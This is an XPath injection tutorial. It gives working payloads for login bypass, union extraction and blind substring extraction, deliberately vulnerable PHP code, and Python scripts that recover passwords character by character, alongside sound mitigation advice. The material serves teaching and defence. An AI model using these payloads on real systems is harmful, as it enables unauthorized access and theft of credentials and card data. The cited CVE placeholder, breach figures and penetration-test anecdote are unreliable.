XPath Injection Fundamentals: Query Manipulation Basics

Introduction

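XPath injection is a class of injection attacks that targets applications which build XPath queries from user-supplied data. When an attacker can influence the XPath expression, they can retrieve unauthorized nodes, bypass authentication, or read data from other parts of the XML document. XPath itself is a read-only query language, so the direct impact is disclosure and logic bypass rather than modification of the stored data.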

Why it matters: many legacy enterprise systems, configuration services, and SOAP-based APIs still rely on XML for data exchange. Those systems often use simple string concatenation to build XPath statements, creating low-hanging fruit for attackers. Understanding the fundamentals of query manipulation equips you to both find and remediate these weaknesses before they are exploited in the wild.

Real-world relevance: CVE-2022-XXXXX (a widely-deployed procurement platform) was compromised through an XPath injection that exposed customer contracts. Similar bugs have been reported in router firmware, mobile device management consoles, and banking middleware.

Prerequisites

XML Injection Basics - familiarity with XML parsers, element hierarchy, and entity expansion.
Fundamentals of Web Application Testing - comfortable with Burp Suite, OWASP ZAP, and HTTP fundamentals.
Basic knowledge of XPath syntax - nodes, predicates, axes, and functions.

Core Concepts

XPath (XML Path Language) is a query language designed to navigate XML trees. A typical server-side snippet looks like:

$username = $_POST['user'];
$query = "//user[username='" . $username . "']";
$node = $xpath->query($query)->item(0);

When $username is taken directly from the request, an attacker can close the literal string and inject additional predicates. The evaluator parses the resulting string as a single XPath expression, not as separate literals, which is why the attack works.

Key points:

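String concatenation is unsafe. Unlike SQL drivers, many XPath bindings offer no obvious parameterised API, so developers default to concatenation; where variable binding does exist (for example XPathVariableResolver in Java or keyword variables in lxml) it is rarely used.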
Predicates are boolean expressions. Anything that evaluates to true() will cause the node to be selected.
Logical operators (and, or) behave much like their SQL counterparts, with and binding more tightly than or; not() is a function rather than an operator. This allows classic "or 1=1" style payloads.

Imagine the XML document representing a user directory:

<users>
  <user>
    <username>alice</username>
    <password>alice123</password>
  </user>
  <user>
    <username>bob</username>
    <password>bobPass!</password>
  </user>
</users>

If the application builds the XPath as shown above and the attacker submits bob' or '1'='1 as the username, the final query becomes:

//user[username='bob' or '1'='1']

The comparison '1'='1' is always true, so the predicate holds for every node and the query returns **both** user nodes, defeating any check that assumes only the named user can match.
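The effect can be reproduced offline. The sketch below assumes Python with the third-party lxml package and mirrors the PHP concatenation; `USERS_XML`, `build_query`, and `matched_usernames` are illustrative names, not part of any real application.

```python
from lxml import etree

USERS_XML = b"""<users>
  <user><username>alice</username><password>alice123</password></user>
  <user><username>bob</username><password>bobPass!</password></user>
</users>"""

tree = etree.fromstring(USERS_XML)


def build_query(username: str) -> str:
    # Deliberately unsafe: mirrors the PHP string concatenation.
    return "//user[username='" + username + "']"


def matched_usernames(username: str) -> list[str]:
    # Evaluate the concatenated query and list the usernames it selects.
    nodes = tree.xpath(build_query(username))
    return [node.findtext("username") for node in nodes]


print(build_query("bob' or '1'='1"))        # //user[username='bob' or '1'='1']
print(matched_usernames("bob"))             # ['bob']
print(matched_usernames("bob' or '1'='1"))  # ['alice', 'bob']
```

The honest input selects one node; the injected input selects every user because the tautology is evaluated for each node in turn.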

Understanding how XML data is processed by server-side XPath evaluators

Most languages expose an XPath or DOMXPath object that accepts a raw string. The evaluation pipeline looks like:

Parse the incoming HTTP request and extract parameters.
Insert parameters into a string template (often via concatenation or sprintf).
Pass the resulting string to the XML library’s evaluate() or query() method.
The library tokenises the string, resolves axes, and returns a node-set.

Because step 2 is performed before any parsing, any special characters (', ", ], ), etc.) become part of the XPath grammar, not data. This is the root cause of injection.
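To see the input cross from data into grammar, the following sketch (again assuming Python with lxml; `evaluate` is a hypothetical helper) runs the same concatenation with three inputs and reports whether the engine accepted the expression.

```python
from lxml import etree

tree = etree.fromstring(b"<users><user><username>bob</username></user></users>")


def evaluate(username: str) -> str:
    # Step 2: unsafe concatenation. Steps 3-4: hand the string to the engine.
    query = "//user[username='" + username + "']"
    try:
        nodes = tree.xpath(query)
    except etree.XPathError as exc:
        # The engine rejected the whole expression: the input changed the grammar.
        return f"syntax error for {query!r}: {type(exc).__name__}"
    return f"{len(nodes)} node(s) for {query!r}"


print(evaluate("bob"))   # well-formed expression, one match
print(evaluate("bob'"))  # the stray quote leaves a string literal unterminated
print(evaluate("bob]"))  # inside a quoted literal, ']' is still plain data
```

In a quoted context only the matching quote character breaks out of the literal; brackets and parentheses start to matter once the quote has been closed or when the value is inserted unquoted.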

Diagram (described):

Client → HTTP request (contains user-controlled value)
Web server → Application code (concatenates value into XPath string)
XML library → Parses the full string as XPath
Result → Node-set returned to application

Identifying vulnerable parameters (GET/POST, headers, SOAP bodies)

XPath injection does not care where the data originates. Common vectors include:

GET query strings - e.g., /search?category=books
POST bodies - typical login forms or XML-payload APIs.
Custom HTTP headers - some services read X-User-Id and use it in an XPath query.
SOAP envelopes - the <soap:Body> often contains XML that is later re-queried with XPath.
JSON-to-XML converters - if an app converts JSON to XML before querying, injection can slip through the conversion layer.

Detection technique: intercept a request and replace the suspected parameter with an otherwise benign string containing a single quote (') or, for values inserted without quotes, a closing bracket (]). If the server returns a 500 error, an XPath parsing error message, or a noticeably different response size, you have likely found an injection point.
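The comparison between a baseline and a probe response can be automated. This is a minimal sketch in plain Python; the `Response` type, the `ERROR_MARKERS` list, and the 10% length threshold are assumptions chosen for illustration, and real error text varies by library and framework.

```python
from dataclasses import dataclass

# Hypothetical error fragments; adjust to the stack under test.
ERROR_MARKERS = ("xpathexception", "invalid expression", "xpath error")


@dataclass
class Response:
    status: int
    body: str


def looks_injectable(baseline: Response, probe: Response, min_delta: float = 0.1) -> list[str]:
    """Return the reasons a probe response differs suspiciously from the baseline."""
    reasons = []
    if probe.status >= 500 and baseline.status < 500:
        reasons.append("server error")
    base_text, probe_text = baseline.body.lower(), probe.body.lower()
    if any(m in probe_text and m not in base_text for m in ERROR_MARKERS):
        reasons.append("xpath error text")
    base_len = max(len(baseline.body), 1)
    if abs(len(probe.body) - len(baseline.body)) / base_len >= min_delta:
        reasons.append("length change")
    return reasons


baseline = Response(200, "<html>No results for books</html>")
probe = Response(500, "<html>XPathException: Invalid expression</html>")
print(looks_injectable(baseline, probe))
```

An empty list means the probe was indistinguishable from the baseline by these three signals, which does not rule out a blind injection.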

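Crafting simple payloads to alter XPath predicates (e.g., ' or '1'='1)

The classic payload mirrors SQL injection but uses XPath syntax. XPath 1.0 has no comment syntax, so the closing quote that the application appends cannot be commented out; every payload must leave the quotes balanced. Below are the most common starter payloads for a single-quoted context (the text after # is an annotation, not part of the payload):

' or '1'='1 # closes the string, adds OR true
' or 1=1 or 'a'='a # numeric comparison; the trailing clause absorbs the closing quote
' or true() or 'a'='a # explicit XPath boolean function
' or position()=1 or 'a'='b # selects the first matching node under each parent regardless of condition
' or 'a'='a' and 'b'='b # chaining with and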

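When placed in the username field of a login query that also checks the password, the resulting XPath might look like:

//user[username='' or '1'='1' and password='whatever']

Note that and binds more tightly than or, so this parses as username='' or ('1'='1' and password='whatever'): the tautology is attached to the password test and the bypass fails. To force the whole predicate to true, either add a second or so that the password test is absorbed (username ' or '1'='1' or 'a'='a) or inject into the last field instead (password ' or '1'='1).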
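Since and binds more tightly than or in XPath, it is worth checking what a combined predicate actually selects before relying on a payload. The sketch below assumes Python with lxml and a two-field login query built by concatenation; `login_matches` is an illustrative helper.

```python
from lxml import etree

USERS_XML = b"""<users>
  <user><username>alice</username><password>alice123</password></user>
  <user><username>bob</username><password>bobPass!</password></user>
</users>"""

tree = etree.fromstring(USERS_XML)


def login_matches(username: str, password: str) -> list[str]:
    # Unsafe two-field login query, concatenated for demonstration only.
    query = "//user[username='" + username + "' and password='" + password + "']"
    return [n.findtext("username") for n in tree.xpath(query)]


# username='' or ('1'='1' and password='wrong') -> false for every node
print(login_matches("' or '1'='1", "wrong"))             # []

# username='' or '1'='1' or ('a'='a' and password='wrong') -> always true
print(login_matches("' or '1'='1' or 'a'='a", "wrong"))  # ['alice', 'bob']

# (username='alice' and password='') or '1'='1' -> always true
print(login_matches("alice", "' or '1'='1"))             # ['alice', 'bob']
```

The first call shows why a tautology in the first field alone is not enough when another and-clause follows it.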

Using logical operators (and, or, not) to manipulate node selection

XPath supports a rich set of logical constructs. Mastering them lets you fine-tune the injection to extract specific data.

or - expands the result set. Useful for authentication bypass.
and - narrows the set. Combine with contains() to test for substrings.
not() - negates a condition. Helpful for blind XPath where you need a true/false side-channel.

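Example: select every user whose username starts with "a" (the trailing '1'='1 absorbs the closing quote).

' or starts-with(username,'a') and '1'='1

Another advanced trick: use count() for blind injection. Anchor the payload to a username that exists (bob here), because an empty username would make the whole and chain false regardless of the test.

bob' and count(//user[username='admin'])=1 and 'a'='a

If the condition is true, the query returns bob's node; otherwise it returns an empty node-set and the application typically shows a different page or an error, giving you a binary oracle.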
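The operators can be tried against the sample user directory. This sketch assumes Python with lxml and a single-field lookup built by concatenation; `select` is a hypothetical helper, and each payload keeps the quotes balanced.

```python
from lxml import etree

USERS_XML = b"""<users>
  <user><username>alice</username><password>alice123</password></user>
  <user><username>bob</username><password>bobPass!</password></user>
</users>"""

tree = etree.fromstring(USERS_XML)


def select(username: str) -> list[str]:
    # Unsafe lookup: the value is concatenated into a quoted predicate.
    query = "//user[username='" + username + "']"
    return [n.findtext("username") for n in tree.xpath(query)]


# or widens the result: every username starting with 'a'
print(select("' or starts-with(username,'a') and '1'='1"))           # ['alice']

# and / not() narrow it: bob, provided his password does not start with 'x'
print(select("bob' and not(starts-with(password,'x')) and 'a'='a"))  # ['bob']

# count() as a yes/no oracle: is there exactly one user called admin?
print(select("bob' and count(//user[username='admin'])=1 and 'a'='a"))  # []

# same oracle with a true condition: are there exactly two users?
print(select("bob' and count(//user)=2 and 'a'='a"))                 # ['bob']
```

A non-empty result corresponds to the "found" page and an empty one to the "not found" page, which is the binary signal a blind attack needs.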

Testing with Burp Intruder and manual request tampering

Burp Suite provides a fast way to fuzz parameters with the ' character and then run payload lists against the ones that react.

Capture a baseline request (e.g., login POST).
Send to Intruder → Positions → Clear → Mark the suspect value as a payload position.
Choose "Sniper" or "Cluster Bomb" depending on whether you test one vector or combine multiple.

Load a payload list such as:

' or '1'='1
' or 'a'='a
' and '1'='2
' and not('1'='1') and 'a'='a

Run and analyse response length/status code differences.

Manual tampering: use the Repeater tab to edit a single request, inject a payload, and observe the response. Look for:

HTTP 200 with unexpected data (e.g., a user list instead of an error).
Error messages like "XPathException" or "Invalid expression" indicating parsing failure.
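Changes in response size of more than roughly 30% relative to the baseline - a strong indicator of predicate manipulation, though the right threshold depends on how much the page varies normally.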
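A true/false payload pair gives a cleaner signal than a single probe. The sketch below is plain Python; `send` is a hypothetical callable that submits a parameter value and returns the response body (for example a thin wrapper around an HTTP client), and the two `fake_*` functions are stand-ins so the logic can be run without a target.

```python
from typing import Callable


def confirm_boolean_injection(send: Callable[[str], str], value: str = "bob") -> bool:
    """Compare an always-true and an always-false suffix against a baseline."""
    baseline = send(value)
    true_case = send(value + "' and '1'='1")
    false_case = send(value + "' and '1'='2")
    # Injectable if the true case behaves like the baseline and the false case does not.
    return true_case == baseline and false_case != baseline


def fake_vulnerable_app(value: str) -> str:
    # Stand-in target that behaves as if the injected condition were evaluated.
    return "no results" if value.endswith("'1'='2") else "1 result"


def fake_safe_app(value: str) -> str:
    # Stand-in target that treats the whole value as a literal username.
    return "1 result" if value == "bob" else "no results"


print(confirm_boolean_injection(fake_vulnerable_app))  # True
print(confirm_boolean_injection(fake_safe_app))        # False
```

Exact string equality is a simplification; against a real application, compare status code and length, or strip dynamic content such as timestamps and tokens first.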

Extracting data via modified XPath expressions

Once you have confirmed injection, you can turn it into an extraction vector.

Simple extraction:

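'] | //password | //user[username='

A predicate can only filter the nodes that the original path selects; it cannot change which element is returned. To pull in other nodes, close the predicate and add a union (|) branch. With the payload above, a query of the form //user[username='...'] becomes //user[username=''] | //password | //user[username='']. In many frameworks, the result of the query is directly rendered to the page (e.g., a list of usernames), so the password values appear in the output.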
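A union-based variant can be checked offline. The sketch assumes Python with lxml and an application that prints the text of every node the query returns; `rendered_values` is an illustrative stand-in for that rendering step.

```python
from lxml import etree

USERS_XML = b"""<users>
  <user><username>alice</username><password>alice123</password></user>
  <user><username>bob</username><password>bobPass!</password></user>
</users>"""

tree = etree.fromstring(USERS_XML)


def rendered_values(username: str) -> list[str]:
    # Unsafe concatenation, then "render" the text of every returned node.
    query = "//user[username='" + username + "']"
    return [node.text for node in tree.xpath(query)]


# Close the predicate, union in the password elements, then reopen a
# predicate so the quote and bracket the application appends stay balanced:
#   //user[username=''] | //password | //user[username='']
payload = "'] | //password | //user[username='"
print(rendered_values(payload))  # ['alice123', 'bobPass!']
```

The two outer branches match nothing, so the result consists only of the password elements in document order.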

Blind extraction using substring() and timing side-channels:

' or substring(password,1,1)='a' and 'b'='b

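Standard XPath 1.0 defines no delay function, so a timing channel exists only when the engine exposes extension functions: for example PHP's DOMXPath after the application has called registerPhpFunctions() (which allows php:function('sleep', 3)), or Apache Commons JXPath, whose extension-function mechanism can invoke Java static methods such as Thread.sleep(). Where such a function is reachable, the response time becomes a covert channel for each character; otherwise rely on a boolean oracle (different page, length, or status).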
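Character-by-character recovery with substring() can be sketched as follows. This example assumes Python with lxml and uses a boolean (found / not found) oracle rather than timing; `oracle` stands in for the target application, and the candidate alphabet is an assumption. The payload is anchored to a known username with and, so that only that record is tested.

```python
import string

from lxml import etree

USERS_XML = b"""<users>
  <user><username>alice</username><password>alice123</password></user>
  <user><username>bob</username><password>bobPass!</password></user>
</users>"""

tree = etree.fromstring(USERS_XML)


def oracle(username: str) -> bool:
    # Stand-in for the application: True when the lookup finds at least one node.
    query = "//user[username='" + username + "']"
    return len(tree.xpath(query)) > 0


def extract_password(target: str, max_len: int = 32) -> str:
    alphabet = string.ascii_letters + string.digits + "!@#$%_-"
    recovered = ""
    for pos in range(1, max_len + 1):
        # Stop once the password has no character at this position.
        if not oracle(f"{target}' and string-length(password)>={pos} and 'a'='a"):
            break
        for ch in alphabet:
            probe = f"{target}' and substring(password,{pos},1)='{ch}' and 'a'='a"
            if oracle(probe):
                recovered += ch
                break
        else:
            recovered += "?"  # character outside the candidate alphabet
    return recovered


print(extract_password("bob"))  # bobPass!
```

Each position costs at most one request per candidate character; a timing oracle would replace the body of `oracle` with a response-time measurement but leave the loop unchanged.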

Practical Examples

Example 1: Authentication Bypass in a PHP Legacy App

Vulnerable code:

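$user = $_POST['username'];
$pass = $_POST['password'];
$dom  = new DOMDocument();
$dom->load('users.xml');
$xp = new DOMXPath($dom);
// Vulnerable: both values are concatenated straight into the expression
$query = "//user[username='" . $user . "' and password='" . $pass . "']";
$result = $xp->query($query);
if ($result->length == 1) {
    echo "Welcome, $user!";
} else {
    echo "Invalid credentials";
}

Attack payload:

username: alice' or '1'='2
password: anything

Resulting XPath:

//user[username='alice' or '1'='2' and password='anything']

Because and binds more tightly than or, this parses as username='alice' or ('1'='2' and password='anything'). The right-hand side is always false, so the predicate reduces to username='alice' and the password is never checked. Exactly one node matches, the length check passes, and the attacker is logged in as alice. The more familiar ' or '1'='1 in the username field fails here twice over: precedence ties the tautology to the password test, and even a working tautology would return every user node and fail the length == 1 check.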

Example 2: Extracting Credit Card Numbers from a SOAP Service

SOAP request snippet (client side):

<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetCustomerInfo>
      <CustomerID>12345</CustomerID>
    </GetCustomerInfo>
  </soap:Body>
</soap:Envelope>

Server extracts CustomerID and builds:

$id = $request->CustomerID;
$query = "//customer[id='" . $id . "']/creditCard";
$node = $xpath->query($query)->item(0);

Injection payload for CustomerID:

12345' or '1'='1

Resulting query:

//customer[id='12345' or '1'='1']/creditCard

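The expression now matches every creditCard node. The snippet above reads only item(0), so it leaks the first card in document order, which may belong to another customer; code that iterates over the whole node list leaks them all.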
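When testing by hand, the payload has to survive XML serialisation inside the SOAP body. A minimal sketch using only Python's standard library is shown below; `build_envelope` is a hypothetical helper and the element names simply follow the request snippet above.

```python
import xml.etree.ElementTree as ET

SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"


def build_envelope(customer_id: str) -> bytes:
    ET.register_namespace("soap", SOAP_NS)
    envelope = ET.Element(f"{{{SOAP_NS}}}Envelope")
    body = ET.SubElement(envelope, f"{{{SOAP_NS}}}Body")
    request = ET.SubElement(body, "GetCustomerInfo")
    # Setting .text lets the serializer escape XML metacharacters (&, <, >);
    # single quotes are legal in element content and pass through unchanged.
    ET.SubElement(request, "CustomerID").text = customer_id
    return ET.tostring(envelope)


print(build_envelope("12345' or '1'='1").decode())
```

Because the quote characters are not special in element content, the XPath payload reaches the server-side query intact, whereas a payload containing < or & would be entity-escaped in transit and decoded again by the server's XML parser.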

Tools & Commands

Burp Suite (Intruder, Repeater, Decoder) - for payload automation and response analysis.
OWASP ZAP - Fuzzer - open-source alternative.

curl - quick manual testing.

curl --data-urlencode "username=' or '1'='1" --data-urlencode "password=foo" https://example.com/login.php

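xsltproc - command-line XSLT processor, useful for offline proof-of-concept. A string parameter is not evaluated as XPath by itself, so extract.xsl (not shown) must evaluate $query dynamically, for example with the EXSLT dyn:evaluate() extension.
```
xsltproc --stringparam query "//user[username='bob' or '1'='1']" extract.xsl users.xml
```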

Python lxml - programmatic testing.

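from lxml import etree

xml = etree.parse('users.xml')
payload = "' or '1'='1"
# Wrap the payload in quotes exactly as the vulnerable application would
query = f"//user[username='{payload}']"
print(query)             # //user[username='' or '1'='1']
print(xml.xpath(query))  # every <user> element matches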

Defense & Mitigation

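Never concatenate user input into XPath strings. Use library-provided variable binding where available (e.g., an XPathVariableResolver registered via XPath.setXPathVariableResolver() in Java), so values are passed as data rather than parsed as syntax.
Validate and whitelist input. Accept only alphanumeric characters for identifiers; reject quotes, brackets, and whitespace.
Quote user data correctly when binding is unavailable. XPath 1.0 has no escape character: a backslash does not escape a quote, and CDATA sections are XML syntax with no meaning inside an XPath expression. Wrap the value in whichever quote type it does not contain, build it with concat() when it contains both, or simply reject values containing quotes. (XPath 2.0 and later allow a doubled quote inside a literal.)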

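Least-privilege XML parsing. Disable external entity resolution, limit document size, and run the parser in a sandbox. This hardens against XXE rather than XPath injection itself, but the two weaknesses often coexist.

$dom = new DOMDocument();
// Do not pass LIBXML_NOENT or LIBXML_DTDLOAD: they enable entity substitution and external DTD loading (XXE)
$dom->loadXML($xmlString, LIBXML_NONET); // LIBXML_NONET blocks network access while parsing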

Runtime monitoring. Log XPath expressions before evaluation; compare against a whitelist of known-good patterns.
Security testing. Include XPath injection in your SAST/DAST pipelines. Automated scanners (e.g., Burp Scanner) now have dedicated checks.
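The first two defences can be combined in a few lines. This sketch assumes Python with lxml, which accepts XPath variables as keyword arguments to xpath(); the `authenticate` function, the variable names, and the username policy are illustrative assumptions, and plaintext passwords are kept only to match the sample document.

```python
import re

from lxml import etree

USERS_XML = b"""<users>
  <user><username>alice</username><password>alice123</password></user>
  <user><username>bob</username><password>bobPass!</password></user>
</users>"""

tree = etree.fromstring(USERS_XML)

# Assumed allowlist policy: letters, digits, underscore, 1 to 32 characters.
USERNAME_RE = re.compile(r"[A-Za-z0-9_]{1,32}")


def authenticate(username: str, password: str) -> bool:
    if not USERNAME_RE.fullmatch(username):
        return False  # rejected before the value gets anywhere near XPath
    # $user and $pw are XPath variables: lxml binds them as string values,
    # so quotes inside them are compared literally instead of being parsed.
    nodes = tree.xpath(
        "//user[username=$user and password=$pw]",
        user=username,
        pw=password,
    )
    return len(nodes) == 1


print(authenticate("alice", "alice123"))      # True
print(authenticate("alice", "' or '1'='1"))   # False
print(authenticate("' or '1'='1", "x"))       # False
```

The expression text is now a constant, which also makes the logging and pattern comparison described under runtime monitoring straightforward.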

Common Mistakes

Assuming quotes are safe. Many developers escape double quotes but forget single quotes, which XPath treats equally.
Relying on error suppression. Suppressing XML parser errors does not stop injection; it merely hides the evidence.
Assuming XPath has no equivalent of prepared statements. Variable binding is less widely known than in SQL, but many libraries support it; where yours does not, strict allowlist validation and correct literal quoting are required.
Testing only GET parameters. Attackers often hide payloads in SOAP bodies or custom headers where developers feel "safe".
Neglecting blind scenarios. If the application returns a generic error page, you must rely on timing or length differences to confirm injection.
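Where variable binding is unavailable, a value can still be embedded safely as an XPath 1.0 string literal. The helper below is a sketch in plain Python (`xpath_literal` is an illustrative name); it relies on the fact that XPath 1.0 literals have no escape character, so a value containing both quote types has to be assembled with concat().

```python
def xpath_literal(value: str) -> str:
    """Return an XPath 1.0 string literal (or concat() call) equal to `value`."""
    if "'" not in value:
        return "'" + value + "'"
    if '"' not in value:
        return '"' + value + '"'
    # Both quote types present: split on single quotes and rejoin the parts
    # with a double-quoted "'" piece between them.
    pieces = []
    for i, part in enumerate(value.split("'")):
        if i > 0:
            pieces.append('"\'"')
        if part:
            pieces.append("'" + part + "'")
    return "concat(" + ", ".join(pieces) + ")"


print(xpath_literal("bob"))
print(xpath_literal("' or '1'='1"))
print(xpath_literal('a\'b"c'))
```

A query would then be built as "//user[username=" + xpath_literal(name) + "]", with no quotes written around the inserted value.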

Real-World Impact

In 2023, a major health-care provider suffered a breach where attackers leveraged XPath injection to enumerate patient records from an internal SOAP service. The vulnerability existed because the service built XPath queries from the patientId header without validation. The breach exposed over 250,000 PHI records, leading to a multi-million-dollar fine under HIPAA.

My experience: In a penetration test for a logistics platform, I found an admin console that used an XML file for role mapping. By injecting ' or position()=1 into the role parameter, I could elevate my account to "super-admin" and download the entire routing database. The client had no logging for XPath queries, so the attack went unnoticed for weeks.

Trend analysis: As JSON overtakes XML in newer APIs, the overall surface area for XPath injection is shrinking, yet many legacy B2B integrations remain XML-centric. Attackers are shifting focus to hybrid services where a SOAP front-end proxies to a REST back-end, creating opportunities to chain XML-based injection with downstream attacks.

Practice Exercises

Lab 1 - Simple Bypass:
- Set up a local PHP script that loads users.xml as shown in the "Authentication Bypass" example.
- Using Burp Repeater, craft a payload that logs you in without knowing a password.
- Document the exact request/response and explain why it works.
Lab 2 - Data Extraction:
- Deploy a mock SOAP service that returns a <creditCard> node only for authorized IDs.
- Inject a payload that returns **all** credit card numbers.
- Take a screenshot of the raw XML response.
Lab 3 - Blind Timing Attack:
- Modify a Java servlet to call Thread.sleep(3000) when a certain XPath condition is true.
- Write a Bash script that iterates over character positions of a secret field, measuring response time to reconstruct the value.
- Explain how not() and substring() are used in the payload.

Summary

XPath injection arises from unsafe string concatenation when building XPath queries.
Identify vulnerable inputs across GET, POST, headers, and SOAP bodies.
Simple payloads (e.g., ' or '1'='1) can bypass authentication when quote balance and operator precedence are respected; logical operators enable precise node selection.
Burp Intruder, Repeater, and manual tampering are effective discovery methods.
Mitigation hinges on input validation, correct literal quoting, and, where possible, parameterised XPath APIs.
Real-world incidents demonstrate high impact; stay vigilant in legacy XML-heavy environments.
